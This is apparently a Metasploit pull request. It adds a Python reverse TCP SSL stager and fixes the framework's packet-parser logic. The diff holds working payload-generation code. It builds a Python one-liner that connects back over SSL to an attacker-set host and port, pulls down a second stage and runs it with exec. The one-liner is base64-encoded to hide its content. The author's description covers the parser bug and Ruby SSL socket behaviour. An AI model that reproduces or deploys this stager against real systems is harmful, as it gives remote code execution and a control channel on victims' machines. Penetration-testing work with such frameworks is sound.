### PR TITLE
Python Metepreter Reverse SSL

### DIFF
--- a/lib/rex/post/meterpreter/packet_parser.rb
+++ b/lib/rex/post/meterpreter/packet_parser.rb
@@ -51,7 +51,9 @@ class PacketParser
       if (self.hdr_length_left == 0)
         self.payload_length_left = raw.unpack("N")[0] - 8
       end
-    elsif (self.payload_length_left > 0)
+    end
+
+    if (self.payload_length_left > 0)
       buf = sock.read(self.payload_length_left)
 
       if (buf)

--- a/modules/payloads/stagers/python/reverse_tcp_ssl.rb
+++ b/modules/payloads/stagers/python/reverse_tcp_ssl.rb
@@ -1,0 +1,52 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'msf/core/handler/reverse_tcp_ssl'
+require 'msf/base/sessions/command_shell'
+require 'msf/base/sessions/command_shell_options'
+
+module Metasploit3
+
+  include Msf::Payload::Stager
+
+  def initialize(info = {})
+    super(merge_info(info,
+      'Name'          => 'Python Reverse TCP SSL Stager',
+      'Description'   => 'Reverse Python connect back stager using SSL',
+      'Author'        => 'Ben Campbell',
+      'License'       => MSF_LICENSE,
+      'Platform'      => 'python',
+      'Arch'          => ARCH_PYTHON,
+      'Handler'       => Msf::Handler::ReverseTcpSsl,
+      'Stager'        => {'Payload' => ""}
+      ))
+  end
+
+  #
+  # Constructs the payload
+  #
+  def generate
+    cmd = ''
+    # Set up the socket
+    cmd += "import ssl,socket,struct\n"
+    cmd += "s=socket.socket(2,1)\n" # socket.AF_INET = 2, socket.SOCK_STREAM = 1
+    cmd += "ss=ssl.wrap_socket(s)\n"
+    cmd += "ss.connect(('#{ datastore['LHOST'] }',#{ datastore['LPORT'] }))\n"
+    cmd += "l=struct.unpack('>I',ss.recv(4))[0]\n"
+    cmd += "d=ss.recv(4096)\n"
+    cmd += "while len(d)!=l:\n"
+    cmd += "\td+=ss.recv(4096)\n"
+    cmd += "exec(d,{'s':ss})\n"
+
+    # Base64 encoding is required in order to handle Python's formatting requirements in the while loop
+    cmd = "import base64; exec(base64.b64decode('#{Rex::Text.encode_base64(cmd)}'))"
+    return cmd
+  end
+
+  def handle_intermediate_stage(conn, payload)
+    conn.put([payload.length].pack("N"))
+  end
+end


### PR DESCRIPTION
Also fixes a strange bit of logic in packet_parser which prevented SSL connection from working...

I couldn't understand the logic, why is it an if elseif? It seems like its should try to recv the packet length from the header and then recv the rest of the packet. However it gets the length and then exits?

This is at odds with the description

> Reads data from the wire and parse AS MUCH of the packet as possible.

This change doesn't appear to affect python/meterpreter/reverse_tcp or window/meterpreter/reverse_tcp negatively...

It appears that the original logic would work if IO.select worked correctly on SSLSockets: https://bugs.ruby-lang.org/issues/8875

I'm not sure if this change breaks much though...
